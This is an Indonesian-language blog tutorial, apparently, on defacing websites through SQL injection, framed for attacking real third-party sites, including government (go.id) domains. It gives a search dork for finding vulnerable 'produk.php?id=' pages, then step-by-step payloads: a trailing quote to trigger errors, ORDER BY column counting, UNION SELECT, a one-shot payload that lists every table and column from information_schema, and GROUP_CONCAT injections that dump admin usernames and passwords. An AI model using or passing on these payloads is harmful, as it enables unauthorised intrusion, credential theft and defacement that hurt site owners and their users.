Cara deface SQL injection

Assalamu'alaikum wr wb

Oke kesempatan kali ini aku akan kash tutorial cara deface metode SQL INJECTION

yang masih belum paham apa itu SQL injection? 

SQL injection adalah Injeksi SQL adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi.

Oke kita langsung ajah tutorialnya

Pertama kalian siapkan bahannya dulu

Bahan: 

- Dork

- HP/PC

- Dios 

- pacar biar ada yang semangatin: v

Dork: - produk.php?id= site:Iloveyou:) 

Kembangin lagi tod biar lebih mantav dapat pacarnya:v

Note: site nya terserah yang kalian mau contoh com,  go.id, dan karepmu cok: v

Dios: (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Oke yang pertama kalian dorking dork yang di atas

Yang kedua kalian tambahin (')  itu dibelakang angka contoh: php?id=56' gitu gan nanti akan eror eror nya gak semua yang ada tulisan ciri² eror:gambar di website gak ada,sama masuknya lama, ets jangan pikiran negatif dulu atuh: v maksudnya lama masuk website gan: v ah gimana sih

Trus yang ketiga kalian tambahin order by di belakang ' dan kalian tambahin angkanya contoh: php?id=56'+order+by+1--+- dan seterusnya sampai eror gan Oke

Oke yang ke empat kalain ganti order by nya jadi +union+select+ Oke

Jika angka eror kamu di 5/10 dan seterusnya kamu ketik php?id=-56Union select+1, 2,3,4--+-

Dan kalian jangan lupa tambahin juga - di depan angka seperti contoh di atas

Trus yang ke lima

Jika nanti akan muncul angka togel nya kalau angka togel nya 2 atau brp kalian masukan Dios nya untuk Dios ada di atas Oke 

Contoh:php?id=-56'+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4--+- 

Nah kayak gitu gan 

Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya, kalo gak admin.

Nah Jika Sudah Lihat, Kalian Tinggal Dump istilahnya, Atau Buka Table Caranya Dengan Masukan Inject : /*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/ 

Disini user dan password saya di Table admin.dan nama table adminnya admin_username. dan passwordnya admin_password. Jadi kalian edit inject nya jadi : /*!50000(SELECT+GROUP_CONCAT([user_id],0x3a,[user_pw]+SEPARATOR+0x3c62723e)+FROM+[securityTab])*/

Yang Saya Tandai [ ] Yang Harus Kalian Ganti.

.php?id=-1+union+select+1,/*!50000(SELECT+GROUP_CONCAT(admin_username,0x3a,admin_password+SEPARATOR+0x3c62723e)+FROM+admin)*/,3,4--+-

Sekian dari tutorial dari saya jika anda mash bingung bisa ketik di kolom komentar Oke wassalamualaikum wr WB